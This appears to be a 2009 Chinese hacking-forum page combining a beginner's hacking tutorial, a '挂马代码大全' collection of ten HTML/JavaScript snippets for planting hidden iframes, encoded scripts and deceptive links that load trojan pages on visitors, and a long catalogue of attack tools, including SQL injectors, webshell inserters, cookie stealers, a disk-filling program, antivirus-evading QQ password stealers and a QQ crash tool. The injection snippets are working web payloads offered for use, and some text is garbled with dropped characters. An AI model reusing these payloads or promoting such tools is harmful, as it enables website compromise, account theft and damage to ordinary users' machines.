三、初步了解网络协议和工作原理: 所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。
四、熟悉几种流行的编程语言和脚本: 同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、a 和cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。
五、熟悉网络应用程序: 网络应用程序包括各种服务器软件后台程序,例如:wuftp、Apache等服务器后台;还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器,然后***并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网络工作原理,这比依靠理论学习要容易许多,能够达到事半功倍的效果! 第一章、基本理论和基本知识 第一节、网络安全术语解释
一、协议: 网络是一个信息交换的场所,所有接入网络的计算机都可以通过彼此之间的物理连设备行信息交换,这种物理设备包括最常见的电缆、光缆、无线WAP和微波等,但是单纯拥有这些物理设备并不能实现信息的交换,这就好像人类的身体不能缺少大脑的支配一样,信息交换还要具备软件环境,这种“软件环境”是人类实现规定好的一些规则,被称作“协议”,有了协议,不同的电脑可以遵照相同的协议使用物理设备,并且不会造成相互之间的“不理解”。 这种协议很类似于“摩尔斯电码”,简单的一点一横,经过排列可以有万般变化,但是假如没有“对照表”,谁也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样,它们通过各种预先规定的协议完成不同的使命,例如RFC1459协议可以实现IRC服务器与客户端电脑的通信。因此无论是黑客还是网络管理员,都必须通过学习协议达到了解网络运作机理的目的。 每一个协议都是经过多年修改延续使用至今的,新产生的协议也大多是在基层协议基础上建立的,因而协议相对来说具有较高的安全机制,黑客很难发现协议中存在的安全问题直接入手进行网络攻击。但是对于某些新型协议,因为出现时间短、考虑欠周到,也可能会因安全问题而被黑客利用。 对于网络协议的讨论,更多人则认为:现今使用的基层协议在设计之初就存在安全隐患,因而无论网络进行什么样的改动,只要现今这种网络体系不进行根本变革,从根本上就无法杜绝网络黑客的出现。但是这种黑客机能已经超出了本书的范围,因而不在这里详细介绍。
二、服务器与客户端: 最简单的网络服务形式是:若干台电脑做为客户端,使用一台电脑当作服务器,每一个客户端都具有向服务器提出请求的能力,而后由服务器应答并完成请求的动作,最后服务器会将执行结果返回给客户端电脑。这样的协议很多。例如我们平时接触的电子邮件服务器、网站服务器、聊天室服务器等都属于这种类型。另外还有一种连接方式,它不需要服务器的支持,而是直接将两个客户端电脑进行连接,也就是说每一台电脑都既是服务器、又是客户端,它们之间具有相同的功能,对等的完成连接和信息交换工作。例如DCC传输协议即属于此种类型。 从此看出,客户端和服务器分别是各种协议中规定的请求申请电脑和应答电脑。作为一般的上网用户,都是操作着自己的电脑(客户端),别且向网络服务器发出常规请求完成诸如浏览网页、收发电子邮件等动作的,而对于黑客来说则是通过自己的电脑(客户端)对其他电脑(有可能是客户端,也有可能是服务器)进行攻击,以达到入侵、破坏、窃取信息的目的。
三、系统与系统环境: 电脑要运作必须***操作系统,如今流行的操作系统主要由UNIX、Linux、Mac、BSD、Windows2000、Windows95/98/Me、Windows NT等,这些操作系统各自独立运行,它们有自己的文件管理、内存管理、进程管理等机制,在网络上,这些不同的操作系统既可以作为服务器、也可以作为客户端被使用者操作,它们之间通过“协议”来完成信息的交换工作。 不同的操作系统配合不同的应用程序就构成了系统环境,例如Linux系统配合Apache软件可以将电脑构设成一台网站服务器,其他使用客户端的电脑可以使用浏览器来获得网站服务器上供浏览者阅读的文本信息;再如Windows2000配合Ftpd软件可以将电脑构设成一台文件服务器,通过远程ftp登陆可以获得系统上的各种文件资源等。
四、IP地址和端口: 我们上网,可能会同时浏览网页、收发电子邮件、进行语音聊天……如此多的网络服务项目,都是通过不同的协议完成的,然而网络如此之大,我们的电脑怎么能够找到服务项目所需要的电脑?如何在一台电脑上同时完成如此多的工作的呢?这里就要介绍到IP地址了。 每一台上网的电脑都具有独一无二的IP地址,这个地址类似于生活中人们的家庭地址,通过网络路由器等多种物理设备(无需初级学习者理解),网络可以完成从一个电脑到另一个电脑之间的信息交换工作,因为他们的IP地址不同,所以不会出现找不到目标的混乱局面。但是黑客可以通过特殊的方法伪造自己电脑的IP地址,这样当服务器接受到黑客电脑(伪IP地址)的请求后,服务器会将应答信息传送到伪IP地址上,从而造成网络的混乱。当然,黑客也可以根据IP地址轻易的找到任何上网者或服务器,进而对他们进行攻击(想想现实中的入室抢劫),因而如今我们会看到很多关于《如何隐藏自己IP地址》的文章。 接下来我解释一下上面提到的第二个问题:一台电脑上为什么能同时使用多种网络服务。这好像北京城有八个城门一样,不同的协议体现在不同的网络服务上,而不同的网络服务则会在客户端电脑上开辟不同的端口(城门)来完成它的信息传送工作。当然,如果一台网络服务器同时开放了多种网络服务,那么它也要开放多个不同的端口(城门)来接纳不同的客户端请求。 网络上经常听到的“后门”就是这个意思,黑客通过特殊机能在服务器上开辟了一个网络服务,这个服务可以用来专门完成黑客的目的,那么服务器上就会被打开一个新的端口来完成这种服务,因为这个端口是供黑客使用的,因而轻易不会被一般上网用户和网络管理员发现,即“隐藏的端口”,故“后门”。 每一台电脑都可以打开65535个端口,因而理论上我们可以开发出至少65535种不同的网络服务,然而实际上这个数字非常大,网络经常用到的服务协议不过几十个,例如浏览网页客户端和服务端都使用的是80号端口,进行IRC聊天则在服务端使用6667端口、客户端使用1026端口等。
五、漏洞: 漏洞就是程序中没有考虑到的情况,例如最简单的“弱口令”漏洞是指系统管理员忘记屏蔽某些网络应用程序中的账号;Perl程序漏洞则可能是由于程序员在设计程序的时候考虑情况不完善出现的“让程序执行起来不知所措”的代码段,“溢出”漏洞则属于当初设计系统或者程序的时候,没有预先保留出足够的资源,而在日后使用程序是造成的资源不足;特殊IP包炸弹实际上是程序在分析某些特殊数据的时候出现错误等…… 总而言之,漏洞就是程序设计上的人为疏忽,这在任何程序中都无法绝对避免,黑客也正是利用种种漏洞对网络进行攻击的,本章开始的字眼儿“网络安全”实际就是“漏洞”的意思。黑客利用漏洞完成各种攻击是最终的结果,其实真正对黑客的定义就是“寻找漏洞的人”,他们并不是以网络攻击为乐趣,而是天天沉迷在阅读他人的程序并力图找到其中的漏洞。应该说,从某种程度上讲,黑客都是“好人”,他们为了追求完善、建立安全的互联网才投身此行的,只不过因为有的黑客或者干脆是伪黑客经常利用具有攻击性的漏洞,近些年人们才对黑客有了畏惧和敌视的心理。
六、加密与解密: 在“协议”的讲解中,我提到了“由于网络设计的基层存在问题……”,简单的说这一问题是允许所有上网者参与信息共享,因而对某些商业、个人隐私在网络上的传送,就会暴露在众目睽睽之下,我们的信用卡、个人电子邮件等都可以通过***或者截获的方式被他人的到,如何才能让这些信息安全呢?读者也许想到了“二战中”的间谍战:参战国家在使用电报的时候,都对代码进行了加密处理,只有知道了“密码薄”的接收者,才可以进行译码工作。正是这种古老的加密方式,在现代化的网络上也依然存在它旺盛的生命力,通过加密处理的信息在网络上传送,无论谁拿到了这份文件,只要没有“密码薄”仍然是白费力气的。 网络上最长使用的是设置个人密码、使用DES加密锁,这两种加密方式分别可以完成用户登陆系统、网站、电子邮件信箱和保护信息包的工作,而黑客所要进行的工作,就是通过漏洞、暴力猜测、加密算法反向应用等方式获得加密档案的明文,有人把“魔高一尺、道高一仗”用在这里,的确是在恰当不过了!网络上的加密方法和需要验证密码的系统层出不穷,黑客也在寻找破解这些系统的种种办法。 可以说,“漏洞”和“解密”是两个完全不同的黑客领域,对于不同的学习者对他们的偏好,将会直接影响到今后将会成为的黑客类型,因而在二者之间的选择,应根据个人喜好进行,本书将会侧重学习“漏洞”方面的知识。
七、特洛伊木马: 特洛伊木马是一个程序,这个程序可以做程序设计者有意设计的未出现过的事情。但是对于特洛伊木马所做的操作,不论是否用户了解,都是不被赞同的。根据某些人的认识,病毒是特洛伊木马的一个特例,即:能够传播到其他的程序当中(也就是将这些程序也变成特洛伊木马)。根据另外的人的理解,不是有意造成任何损坏的病毒不是特洛伊木马。最终,不论如何定义,许多人仅仅用“特洛伊木马”来形容不能复制的带有恶意的程序,以便将特洛伊木马与病毒区分开 第二节、常用黑客软件用途分类
一、防范: 这是从安全的角度出发涉及的一类软件,例如防火墙、查病毒软件、系统进程监视器、端口管理程序等都属于此类软件。这类软件可以在最大程度上保证电脑使用者的安全和个人隐私,不被黑客破坏。网络服务器对于此类软件的需要也是十分重视的,如日志分析软件、系统入侵软件等可以帮助管理员维护服务器并对入侵系统的黑客进行追踪。
二、信息搜集: 信息搜集软件种类比较多,包括端口扫描、漏洞扫描、弱口令扫描等扫描类软件;还有***、截获信息包等间谍类软件,其大多数属于亦正亦邪的软件,也就是说无论正派黑客、邪派黑客、系统管理员还是一般的电脑使用者,都可以使用者类软件完成各自不同的目的。在大多数情况下,黑客使用者类软件的频率更高,因为他们需要依靠此类软件对服务器进行全方位的扫描,获得尽可能多的关于服务器的信息,在对服务器有了充分的了解之后,才能进行黑客动作。
三、木马与蠕虫: 这是两种类型的软件,不过他们的工作原理大致相同,都具有病毒的隐藏性和破坏性,另外此类软件还可以由拥有控制权的人进行操作,或由事先精心设计的程序完成一定的工作。当然这类软件也可以被系统管理员利用,当作远程管理服务器的工具。
四、洪水: 所谓“洪水”即信息垃圾炸弹,通过大量的垃圾请求可以导致目标服务器负载超负荷而崩溃,近年来网络上又开始流行DOS分散式攻击,简单地说也可以将其归入此类软件中。洪水软件还可以用作邮件炸弹或者聊天式炸弹,这些都是经过简化并由网络安全爱好者程序化的“傻瓜式”软件,也就是本书一开始指责的“伪黑客”手中经常使用的软件。
五、密码破解: 网络安全得以保证的最实用方法是依靠各种加密算法的密码系统,黑客也许可以很容易获得一份暗文密码文件,但是如果没有加密算法,它仍然无法获得真正的密码,因此使用密码破解类软件势在必行,利用电脑的高速计算能力,此类软件可以用密码字典或者穷举等方式还原经过加密的暗文。
六、欺骗: 如果希望获得上面提到的明文密码,黑客需要对暗文进行加密算法还原,但如果是一个复杂的密码,破解起来就不是那么简单了。但如果让知道密码的人直接告诉黑客密码的原型,是不是更加方便?欺骗类软件就是为了完成这个目的而设计的。
七、伪装: 网络上进行的各种操作都会被ISP、服务器记录下来,如果没有经过很好的伪装就进行黑客动作,很容易就会被反跟踪技术追查到黑客的所在,所以伪装自己的IP地址、身份是黑客非常重要的一节必修课,但是伪装技术需要高深的网络知识,一开始没有坚实的基础就要用到这一类软件了。 第三节、学习黑客的基本环境
一、操作系统的选择: 我们经常听说黑客酷爱Linux系统,这是因为Linux相对Windows提供了更加灵活的操作方式,更加强大的功能。例如对于IP地址的伪造工作,利用Linux系统编写特殊的IP头信息可以轻松完成,然而在Windows系统下却几乎不可能做到。但是Linux也有它不足的一面,这个系统的命令庞杂、操作复杂,并不适合初学者使用,而且对于个人学习者,并没有过多的人会放弃“舒适”的Windows、放弃精彩的电脑游戏和便捷的操作方式,去全心投入黑客学习中。而且对于初学黑客的学习者来说,大多数网络知识都可以在Windows系统中学习,相对Linux系统,Windows平台下的黑客软件也并不在少数,另外通过***程序包,Windows系统中也可以调试一定量的程序,因此初步学习黑客没有必要从Linux入手。 本书使用的平台WindowsME,因为对于个人用户来说,NT或者2000多少有些苛刻——系统配置要求太高;然而使用95或者98又缺少某些必要的功能——NET、TELNET命令不完善。但是本书的大部分内容测试漏洞,从远程服务器出发,所以也不是非要WindowsME操作系统进行学习,对于少数系统版本之间的差异,学习者可以和我联系获得相应系统的学习方法。
二、需要的常用软件: 如果你的系统是WindowsME,那么告诉你一个好消息——你没有必要***过多的额外软件,因为我们接触的黑客知识依靠系统提供给我们的命令和内置软件就足可以完成了!除了基本的操作系统以外,学习者还需要***各类扫描器,之后下载一个比较优秀的木马软件、一个***类软件,除此以外别无它求。如果有必要,读者可以自行***本文上述软件,然后学习其用法,但是我要告诉你,对于各类炸弹、还有网络上各式各样的黑客软件,在学习完本书后,你都可以自己制作、自己开发,根本没有必要使用他人编写的软件。 对于扫描器和***软件,我给出以下建议,并且在本书的后面还会对这几个软件进行详细介绍: 扫描器:x-sca er 下载地址:http://www.xfocus.org/ ***软件:analyzer 下载地址:http://netgroup-serv.polito.it/netgroup/tools.html 木马:BackOffice 下载地址:http://www.hack-net.com/ 这三个软件都是免费的,而且功能异常强大。像xsca er是国产软件,他集成了多种扫描功能于一身,并且同时支持控制台和图形界面两种操作方式,另外提供了详细的漏洞使用说明。对于初学者来说,具备了这两个工具,学习黑客已经绰绰有余了。
三、额外的工具: 如果可以***下面的工具,将会对学习黑客有莫大的帮助,当然下面的软件主要是学习额外内容并为“第二部分”学习作铺垫用的,所以没有也不会妨碍本书的学习。
1、后台服务器: 拥有某些网络应用的后台服务程序,可以将自己的电脑设置成一个小型服务器,用来学习相应的网络应用,从“内部”了解其运作机理,这将会大大提高自己对服务器的感性认识,同时还能够在激活服务器的时候;监测自己服务器上的数据,如果有其他黑客来攻击,则可以清晰的记录下对方的攻击过程,从而学习到更多的黑客攻击方法。对于本书而言,主要介绍网站的Perl和a 等脚本语言漏洞,所以可以***一个IIS或者HTTPD。然后在***ActivePerl,使自己的服务器具备编译cgi和pl脚本的能力。使用自己的服务器还有一个好处,可以节省大量的上网时间,将学习、寻找漏洞的过程放到自己的电脑上,既节省了金钱、有不会对网络构成威胁,一举两得。
2、C语言编译平台: 今后在学习黑客的路途中,将会遇到很多“属于自己的问题”,这些问题网络上的其他人可能不会注意,所以无法找到相应的程序,这个时候学习者就要自己动手开发有关的工具了,所以***一个Borland C++将会非常便捷,通过这个编译器,学习者既可以学习C语言,也能够修改本书后面列出的一些小程序,打造一个属于自己的工具库。
四、网络安全软件分类 现在我们来了解一下有关网络安全软件的分类,因为学习黑客知识是两个相互联系的过程:既学习如何黑,还要学会如何防止被黑。
1、防火墙: 这是网络上最常见的安全机制软件,防火墙有硬件的、也有软件的,大多数读者看到的可能更多都是软件防火墙。其功能主要是过滤垃圾信息(保证系统不会受到炸弹攻击)、防止蠕虫入侵、防止黑客入侵、增加系统隐私性(对敏感数据进行保护)、实时监控系统资源,防止系统崩溃、定期维护数据库,备份主要信息……防火墙可以将系统本身的漏洞修补上,让黑客没有下手的机会。另外对于拥有局域网的企业来说,防火墙可以限制系统端口的开放,禁止某些网络服务(杜绝木马)。
2、检测软件: 互联网上有专门针对某个黑客程序进行清除的工具,但是这类软件更多是集成在杀毒软件或者防火墙软件内的,对于系统内的木马、蠕虫可以进行检测并清除,软件为了保护系统不受侵害,会自动保护硬盘数据、自动维护注册表文件、检测内容可以代码、监测系统端口开放状态等。如果用户需要,软件还可以编写有关的脚本对指定端口进行屏蔽(防火墙一样具备此功能)。
3、备份工具: 专门用来备份数据的工具可以帮助服务器定期备份数据,并在制定时间更新数据,这样即便黑客破坏了服务器上的数据库,软件也可以在短时间内完全修复收到入侵的数据。另外对于个人用户,这类软件可以对硬盘进行完全映像备份,一旦系统崩溃,用户利用这类软件可以将系统恢复到原始状态,例如Ghost就是这类软件中的佼佼者。 4、日志纪录、分析工具: 对于服务器来说,日志文件是必不可少的,管理员可以通过日志了解服务器的请求类型和请求来源,并且根据日志判断系统是否受到黑客攻击。通过日志分析软件,管理员可以轻松的对入侵黑客进行反追踪,找到黑客的攻击来源,进而抓不黑客。这也就是为什么黑客在攻击的时候多采用IP地址伪装、服务器跳转,并在入侵服务器之后清除日志文件的原因
( Sun, 3 May 2009 16:49:47 +0800 )
Description:
挂马代码大全(2009-04-20 19:55:36)
一:框架挂马
iframe src=地址 width=0 height=0/iframe
二:js文件挂马
首先将以下代码
document.write("iframe width='0' height='0' src='地址'/iframe");
保存为xxx.js,
则JS挂马代码为
< cript language=javascript src=xxx.j gt lt;/script
三:js变形加密
SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt/script
muma.txt可改成任意后缀
四:body挂马
< ody onload="window.location='地址';"/body
五:隐蔽挂马
top.document.body.i erHTML = top.document.body.i erHTML + 'iframe src="http://www.xxx.com/muma.htm/"/iframe';
六:c 中挂马
background-image: url('javascript:document.write("< cript src=http://www.XXX.net/muma.j gt lt;/script")')}
七:JAJA挂马
SCRIPT language=javascript
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
/script
八:图片伪装上海网页设计html
iframe src="网马地址" height=0 width=0/iframe
img src="图片地址"/center
九:伪装调用:
frameset rows="444,0" cols="*"
frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"
frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"
/frameset
十:高级欺骗
a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;" 页面要显示的内容 /a
SCRIPT Language="JavaScript"
function www_163_com (){
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,
status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
/SCRIPT
( Sun, 3 May 2009 00:30:03 +0800 )
Description:
运行环境: Win9X/Win2000/WinXP/Win2003/
软件大小: 1.14MB
软件语言: 简体中文
软件等级: 安全检测: 无病毒/无插件
软件介绍 mwh6660423 功能: 1.自动申请37/60天金山毒霸通行证 2.操作简便,易于掌握 3.VISTA操作系统下请使用管理员身份进行运行 4.内置了下载金山毒霸和金山在线杀毒的连接,使初次使用者更加方便 5.无限次使用,完全免费 6.对金山主程序并无任何破解行为 2009年3月18日 更新: v3.1版 升级是为了逃避追杀,,,,,本程序绝不含病毒和恶意代码,,如将本程序定义为病毒纯属人品问题!!!!!! ·2009年2月6日 更新: v3.0版 可以说这个版本是划时代的一个版本,,因为......被金山当成病毒了... 所以,更新一下 再次声明,本软件绝无恶意代码和病毒!如果疑虑请下载后删除 请勿用于非法和商业用途,,谢谢 ·2008年12月13日 更新: v2 ·2009年2月6日 更新: v3.0版 可以说这个版本是划时代的一个版本,,因为......被金山当成病毒了... 所以,更新一下 再次声明,本软件绝无恶意代码和病毒!如果疑虑请下载后删除 请勿用于非法和商业用途,,谢谢.9版 近几天很多网友反应已经不能在最新版下再次申请,所以更新了 其他无更新... ·2008年11月24日 更新: v2.8版 重大升级,率先完美支持金山毒霸2009的升级和申请通行证 增加使用金山毒霸2009系列产品的帮助文件(官方原版)
经测试可以申请金山毒霸2009的通行证,金山毒霸2009正式版已经发布了,大家快下载去吧,赶紧卸掉2008换上2009,反正都可以免费升级 下载地址 : ( Fri, 1 May 2009 22:32:46 +0800 )
Description: mwh6660423发布于 2009-04-25 21:37:07 1.7版本更新:
1. 再次优化主探IP算法,提高主探IP能力
2. 本地会员(会员表情涂鸦,登陆提示等)
3. 内存自动优化,减少使用内存
4. 暂未获得对方IP时显示对方上次登陆的所在地
5. 修改了1.6可能出现CPU占用过高的BUG
6. 修改了1.6可能出现的随机崩溃的BUG
7. 加强了对QQ2007II及QQ2008贺岁版的兼容性,不会再出现"宝"字不能随聊天框移动的情况
8. 修改了1.6版发图片探IP时,可能将剪贴版内容发送出去的问题
9. 优化了QQ路径搜索算法,解决很多人启动可能无法找到QQ路径的问题
10. 解决了1.6在线表情库无法更新的问题 本地下载地址: 赛博QQ下载地址: ( Wed, 18 Mar 2009 09:42:08 +0800 )
Description: 1.LJ生成器V1.0
下载地址:
软件介绍:· LJ生成器V1.0 确定运行后,请到C盘观看战果! 运行后C盘生成10GLJ文件,请小心使用! 如果直接破坏别人硬盘,嘿嘿,后果将不堪设想!
2.A inthe-1.4
下载地址:
软件介绍:· SQL注入经典工具最新版本支持Oracle/MSSQL/SYBASE/POSTGRESQL的盲注入以及MS SQL SERVER不同版本的Error Base注入(原来每个版本还不一样
3. PHP注射工具 kEvinSIs
下载地址:
软件介绍:· 一个PHP注射工具 kEvinSIs
4.一个至今没公布的SQL注射综合程序
下载地址:
软件介绍:· 感谢火狐
5.阿D-SQL注射2.3(火狐专用破解版)
下载地址:
软件介绍:· 阿D-SQL注射2.3【火狐专用】 简介:阿D-SQL注射工具2.3火狐破解专用版^_ 输入任意 ID和密码即可登陆√ 勿传播谢谢合作,解除了VIP功能限制! 强,主要在注入方面,增强了搜索类型的检测...
6.ASP木马插入器 1.0
下载地址:
软件介绍:· WebTool.exeWEB综合检测工具ver 2.1WebShellControl.exe最终版集各种脚本SHELL功能于一身,没有任何GET提交
7. 跨站ASP和PHP取COOKIE程序
下载地址:
软件介绍:· 跨站ASP和PHP取COOKIE程序
8.啊D注入工具 2.0 超酷破解版
下载地址:
软件介绍:· 啊D注入工具 2.0 超酷破解版
9.啊D注入助手
下载地址:
软件介绍:· 啊D注入助手功能不多,我的手动注入工具!也可以当作是查看网页源码的工具!
10. ASP+PHP注入的工具:HDSI 2.0
下载地址:
软件介绍:· 说明:HDSI 2.0 经过了2个月的优化与修改。已经修正了目前所知的BUG。优化了猜解速度还增加了PHP注入功能
11.HDSI超速版
下载地址:
软件介绍:· HDSI2005 1.3 超速版 BY 教主
12.小幽注射工具
下载地址:
软件介绍:· 小幽注射工具 小幽出品
13.php注入辅助工具:ph end
下载地址:
软件介绍:· php注入辅助工具.by:Lilo[BST
14.j 暴源代码工具
下载地址:
软件介绍: j 暴源代码工具作者:随爱飞翔
15.上传利用工具:Kendy_upfile
下载地址:
16.NBSI2.0商业版
下载地址:
17. sql注入工具:HDSI2005
下载地址:
18.绝世猜解SQL注射 1.0
软件介绍:· 绝世猜解SQL注射 1.0BUGKIDZ-臭要饭的!以前编写的sql注射工具,使用率相当广泛!简单实用的工具
下载地址:
19.SuperSQLEXEC和SQLEXEC两种工具
软件介绍:· SuperSQLEXECSuperSQLEXEC与以前的SQLEXEC有所不同,在SQL Server 6.5和7.0下使用者SQLEXEC天行软件最新公开推出 MS-SQL Exec for Net...
下载地址:
20.啊DSQL注入工具
下载地址:
21.PHP注入工具超强工具包
软件介绍:· PHP注入工具超强工具包 PHP注入工具超强工具包.包括:casi_v1.1,casiv2.0,PHP-Mysql注射分析器,幻影旅团mysql注入利用工具,2wa.exe,php_script.ex...
下载地址:
22.多线程+中文破解SQL自动注入猜解机
软件介绍:· 用法:MASI url infourl :为有注入漏洞的链接info :为返回TRUE时的特征字符串多线程,中文猜解率极高
下载地址:
23.NBSI2正式商业破解版
软件介绍:· NBSI2网站漏洞检测工具 正式商业破解版此为8月26本站公布的正式版的破解版本,之前的版本注册码过期无法使用,此版本无限制使用,仅提供会员下载。免责须知:本站发布此软件,为大家方便a 程序检测,不...
下载地址:
黑客工具之*QQ专区*
1.腾讯QQ收费头像大礼包
下载地址:
3. 阿拉大盗1.71(10.1更新)
下载地址:
软件介绍:· 10月1日更新,通过卡巴、江民、瑞星、金山、麦咖啡、诺顿等杀毒软件最新病毒库的检测。注意:本软件仅供编程爱好者学习研究之用,请勿用作非法用途,否则其所造成的一切后果由使用者自行承担,作者不承担任何法律...
4.TM发送者 V2.0
下载地址:
软件介绍:· 软件名称: TM发送者 V2.01.本程序能*** QQ2005,QQ2004,新浪UC,网易POPO,雅虎通,并且定时随机抽取其中的一条语句并发送给对方好友, 并提供了锁定网页功能和下载者有机结...
5.QQ IP数据库BuBuild 0925 纯真版
下载地址:
软件介绍:· 收集了包括中国电信、中国网通、长城宽带、网通宽带、聚友宽带等 ISP 的最新准确 IP 地址数据。包括最全的网吧数据。希望能够通过大家的共同努力打造一个没有未知数据,没有错误数据的QQ IP。IP数据...
6. 广告QQ代码生成器 V1.2(加QQ强制对话功能)
下载地址:
软件介绍:· 广告QQ代码生成器 V1.2(加QQ强制对话功能) 编成环境:VisualBasic6.0一、广告QQ代码生成器 请将您的QQ号码、网址(网址可不填)和广告内容,填写到相应的对话框中。...
7.QQ聊天记录器V3.050920 注册版
下载地址:
8.啊拉QQ大盗0923版
下载地址:
软件介绍:· 支持最新的QQ2005Beta3、TM2005正式版在内的所有QQ版本!使用126信箱时,发信和收信要用不同的信箱,否则会被过滤。注意:本软件仅供编程爱好者学习研究之用,请勿用作非法用途,否则其所造成...
9. 腾讯QQ 2005 Beta3 珊瑚虫版 3.1.6
下载地址:
10. QQ建群精灵
下载地址:
11.QQ发发 1.0
下载地址:
12.中天QQ变性补丁
下载地址:
13. 阿彬QQ信息机 V1[1].0+ 注册机
下载地址:
14.QQ白骨精专杀工具
下载地址:
15.QQ直接按号群发1.4 注册版
下载地址:
软件介绍: 已经测试,很好用!QQ群发,最好的QQ群发软件,支持QQ2005,全自动模式工作,高速群发QQ消息,高效率,日发送20000以上广告
16.QQ聊天室信息自动发送机
下载地址:
17.宝宝的QQ头像
下载地址:
软件介绍:· 宝宝QQ:590268新增很多头像!希望大家喜欢!修改工具为photoshop7.019.1号做如果转载请注明是我修改的哦!要知道一个头像要1分钟才出来啊!好麻烦的来!
18. 啊拉QQ大盗0831版
下载地址:
19.超酷QQ签名修改器《QQ签名自动变换》
下载地址:
20. 1.3M的绿色QQ
下载地址:
21. QQ发发 V1.0
下载地址:
22. QQRein v1.2 (终结版)
下载地址:
23.五洲QQ IP数据库 2005.08.05
下载地址:
软件介绍:· IP数210030条。集五大洲IP,创一流IP库,高压缩,高准确度,IP数量保持第一的IP库。
24.QQ表情溢出工具
下载地址:
软件介绍: · Q表情溢出工具空白表情:只需要发送表情给对方就ok了溢出工具:打开就可用了二者同时使用效果更佳利用色块堆积溢出原理,导入表情后会在qq自定义表情里面添加一个空白的表情,发给对方,对方QQ就挂了,是对付...
25. 啊拉QQ大盗0806免杀版
下载地址:
26. 宝宝的QQ头像
下载地址:
27.阿啦qq大盗1.6J会员版
下载地址:
软件介绍:· 您现在使用的是~啊拉QQ大盗~单独编译版本。1.新增还原精灵自动转存功能,直接控制还原精灵,不需要额外程序。2.支持网站收信模式,速度快,不丢信。提供ASP接口文件。3.应大家的强烈要求,此版重新开放...
28. 武汉男生_TMHacker 全脱壳版
下载地址:
软件介绍:· 一个我很喜欢的,但别人却很讨厌的东西其实是一个聊天软件的尾吧木马生成器已经把壳全脱光光啦,喜欢的生成后自己加壳吧
29. QQRein bete 1.1(正式版)
下载地址:
软件介绍: · QQRein bete 1.1(正式版) 傻瓜盗QQ的!
30.Q宠保姆简化版
下载地址:
31. 阿啦qq大盗1.6J 会员+加免杀
下载地址:
32. 腾讯 QQ2005 Beta 2 珊瑚虫集成版3.1.5a
下载地址:
33. 阿拉qq大盗1.6X
下载地址:
34.QQ2005 Beta2黑客版 下载
下载地址:
35. QQrein1.0最新盗号工具
下载地址:
36.QQ挂机大王测试版
下载地址:
37.Q宠成长伴侣 V2.05
下载地址:
38. QQ头像
下载地址:
软件介绍:· 这是我收集和修改的头像,自己感觉挺好的,拿出来给大家一起用!希望大家喜欢
39. 腾讯QQ2005 Beta2 精灵坊显IP版 v4.0
下载地址:
40. QQ宠物挂机伴侣 for 0705
下载地址:
软件介绍:· 能定时为宠物喂食、清洁,并选择打工,两只宠物一起挂,经72小时测试,宠物一切正常
41. (挂qq工具)ccWAP Browser V3.2
下载地址:
软件介绍:· ccWAP Browser 是一个专门浏览WAP网页的浏览器。可以显示源代码页,ccWAP显示的页面和你用带有web功能的手机浏览时的显示一样。
42.Q脱机挂平台1.5版
下载地址:
43.搜客QQ挂级服务端
下载地址:
44. 腾讯QQ 2005 Beta 2 珊瑚虫版 v3.1.5
下载地址:
45. QQ群登快手
下载地址:
46.QQ宠物挂机伴侣 for 0701
下载地址:
47.腾讯QQ/TM 珊瑚虫外挂 V4.0 第一公测版
下载地址:
48. QQ显隐身软件小补丁
下载地址:
49.炽炎-QQ宠物奶妈 1.2
下载地址:
50. QQ挂机王(专业提升QQ等级)
下载地址:
51.QQSniffer(QQ局域网嗅探)
下载地址:
52.QQ代理公布器2005
下载地址:
53. QQ2005密码管理v2.0 破解版
下载地址:
54.啊拉QQ大盗精简免杀版
下载地址:
55.啊拉QQ大盗 V1.6B (20050606)
下载地址:
56.QQ消息群发王
下载地址:
57.最新QQ也疯狂3.0挂机内测版本!
下载地址:
58.在自已的网页上挂QQ支持任何空间+挂多QQ
下载地址:
59.QQ靓号精灵1.91破解版
下载地址:
60.QQ聊天伴侣 V3.5
下载地址:
61.QQ病毒专杀工具XP QQKav 2005 SP1
下载地址:
62.腾讯 QQ2005 Beta1珊瑚虫版 3.06
下载地址:
63.QQ IP数据库 Build 0330 纯真版
下载地址:
软件介绍:· 收集了包括中国电信、中国网通、长城宽带、网通宽带、聚友宽带等 ISP 的最新准确 IP 地址数据。包括最全的网吧数据。希望能够通过大家的共同努力打造一个没有未知数据,没有错误数据的QQ IP。IP数
64. QQ第六感 v1.1 破解版
下载地址:
软件介绍:· QQ第六感 v1.1 破解版一款QQ的辅助软件,用它可以查找到包括网吧、校园网等在内的各种局域网中的所有在线QQ的号码,是你认识GGMM的最佳工具,程序直接在本机上使用,不需要任何服务端程序(非木马)...
65. 价值360个Q币的腾讯官方收费自定义头像
下载地址:
66. 不被卡巴杀的珊瑚虫外挂
下载地址:
67.QQ号码分析器 1.51
下载地址:
70. QQ盗神最新版
下载地址:
71.最新QQ自动登录(器)
下载地址:
72.QQ炫音
下载地址:
73. 飘叶千夫指 2005 贺岁版
下载地址:
74. QQ万能发送精灵 V1.2 免费版
下载地址:
软件介绍:轻松与任何QQ号码聊天,不需要通过对方验证,即使对方设置的是拒绝加入,也能直接给对方发送信息,当然发送表情也是可以的啦。怎么样,神奇吧?
75. QQ优化设置 V3.0.2
下载地址:
76.qq强制视频木马V2.0
下载地址:
77. QQ聊天记录终结者 V4.0 破解版
下载地址:
